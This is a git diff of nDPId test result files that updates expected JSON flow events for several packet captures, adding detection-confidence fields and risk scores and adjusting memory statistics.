+00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
+00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
+00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00162{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","total-events-serialized":240}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -246,10 +246,10 @@
 ~~ total active/idle flows...: 37/37
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 6135270 bytes
-~~ total memory freed........: 6135270 bytes
-~~ total allocations/frees...: 118513/118513
+~~ total memory allocated....: 6208415 bytes
+~~ total memory freed........: 6208415 bytes
+~~ total allocations/frees...: 120103/120103
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 167 chars
-~~ json string max len.......: 3191 chars
-~~ json string avg len.......: 1748 chars
+~~ json string max len.......: 3217 chars
+~~ json string avg len.......: 1761 chars
diff --git a/test/results/pop3.pcap.out b/test/results/pop3.pcap.out
index 2db6235f1..a747d7f1d 100644
--- a/test/results/pop3.pcap.out
+++ b/test/results/pop3.pcap.out
@@ -3,8 +3,8 @@
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1349776771892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1349776771892,"pkt":"ABffs8QAAMCfw1sHCABFEAA8\/wtAAEAGdh2P4eW1StAFHInXAG5gksK3AAAAAKACFtDFsQAAAgQFtAQCCAoAYD28AAAAAAEDAwY="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1349776772030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1349776772030,"pkt":"AMCfw1sHABffs8QACABFAAA8AABAADUGgDlK0AUcj+HltQBuidcdXnV7YJLCuKASFqDzqQAAAgQFtAQCCApTpKX2AGA9vAEDAwk="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1349776772030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1349776772030,"pkt":"ABffs8QAAMCfw1sHCABFEAA0\/wxAAEAGdiSP4eW1StAFHInXAG5gksK4HV51fIAQAFzFqQAAAQEICgBgPkZTpKX2"}
-00703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}}
-00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"POP3","breed":"Unsafe","category":"Email"}}
+00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}}
+00785{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 31/31
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597776 bytes
-~~ total memory freed........: 4597776 bytes
-~~ total allocations/frees...: 99585/99585
+~~ total memory allocated....: 4682729 bytes
+~~ total memory freed........: 4682729 bytes
+~~ total allocations/frees...: 101175/101175
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
-~~ json string max len.......: 708 chars
-~~ json string avg len.......: 492 chars
+~~ json string max len.......: 815 chars
+~~ json string avg len.......: 539 chars
diff --git a/test/results/pps.pcap.out b/test/results/pps.pcap.out
index c155dd871..3b5020cb1 100644
--- a/test/results/pps.pcap.out
+++ b/test/results/pps.pcap.out
@@ -122,208 +122,209 @@
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":921,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1467353136439,"flow_last_seen":1467353136900,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":8362,"flow_avg_l4_payload_len":261,"midstream":0,"ts_msec":1467353136900,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAAUUA1lAAIAGkOvAqHMIZePIC8UfAFBKp6EFWDmKmFAQ\/\/B9QgAAR0VUIC90cmFjazI\/YT0xJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxMzgmYz1hZTg3Y2IzY2ZkZjQ5NGFhNDhkYzYwODkwOWY2OTI1MCZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTg4NzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTI3NTU4JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPWFlYTU2YTgwOGZjOTJlZjM2MDUxOTEyMTk0OGUwZjI3JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU5MTI0JnZlPTEmdz0yLDMgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29t